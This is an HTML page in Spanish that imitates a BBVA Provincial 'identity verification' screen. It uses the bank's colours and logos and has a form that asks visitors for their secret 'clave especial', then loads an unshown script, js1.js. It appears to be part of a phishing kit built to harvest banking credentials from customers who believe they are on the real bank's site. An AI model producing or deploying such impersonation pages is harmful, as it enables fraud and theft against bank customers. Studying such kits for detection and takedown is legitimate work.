<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BBVA Provincial - Verificación de Identidad</title>
    <style>
        body {
            margin: 0;
            font-family: Arial, sans-serif;
            background: white;
            padding-top: 70px;
            padding-bottom: 70px;
        }

        .container {
            max-width: 400px;
            margin: 0 auto;
            text-align: center;
        }

        header {
            background: #072146;
            color: white;
            padding: 20px;
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            z-index: 1000;
            display: flex;
            align-items: center;
            justify-content: flex-start;
            box-sizing: border-box;
        }

        .logo img {
            height: auto;
            margin-left: 10px;
        }

        h1 {
            font-size: 26px;
        }

        h2{
            color: #004080;
        }

        .form-container {
            margin: 50px 20px 20px;
            background: #FFF6D8;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
        }

        .input-group {
            display: flex;
            flex-direction: column;
            align-items: center;
            padding: 6px;
            margin: 25px 0;
            text-align: center;
            height: 60px;
        }

        .label {
            font-size: 14px;
            color: #666;
        }

        input, select {
            background: #F4F4F4;
            border: none;
            border-bottom: 2px solid black;
            color: black;
            font-size: 18px;
            padding: 12px 5px;
            outline: none;
            width: 100%;
            height: 45px;
            box-sizing: border-box;
            border-color: #8F8F8F;
            font-size: 14px;
            text-align: center;
        }

        input::placeholder {
            color: black;
            font-size: 14px;
            padding-left: 10px;
        }

        .btn {
            background: #005BAC;
            color: white;
            font-size: 18px;
            padding: 10px;
            border: none;
            width: 100%;
            cursor: pointer;
            margin-top: 10px;
            margin: 25px 0;
            border-radius: 15px;
        }

        footer {
            background: #072146;
            color: white;
            padding: 20px;
            position: fixed;
            bottom: 0;
            left: 0;
            right: 0;
            z-index: 1000;
            display: flex;
            justify-content: center;
            align-items: center;
            box-sizing: border-box;
        }

        .footer-logo {
            display: flex;
            justify-content: center;
            align-items: center;
            margin-bottom: 10px;
        }

        .footer-logo img {
            height: auto;
        }
    </style>
</head>
<body>
    <div class="container">
        <header>
            <div class="logo">
                <img src="logo.png" alt="BBVA Provincial">
            </div>
        </header>

        <main>
            <div class="form-container">
                <h2>Verificación de Identidad</h2>
                <form>
                    <label class="input-group">
                        <span class="label" style="color: #000000;">  Introduce tu clave especial</span>
                        <input type="text" placeholder="Clave especial">
                    </label>

                    <button type="submit" class="btn">Siguiente</button>
                </form>
            </div>
        </main>

        <footer>
            <div class="footer-logo">
                <img src="footer.png" alt="BBVA Provincial">
            </div>
        </footer>
    </div>
    <script src="js1.js"></script>
</body>
</html>
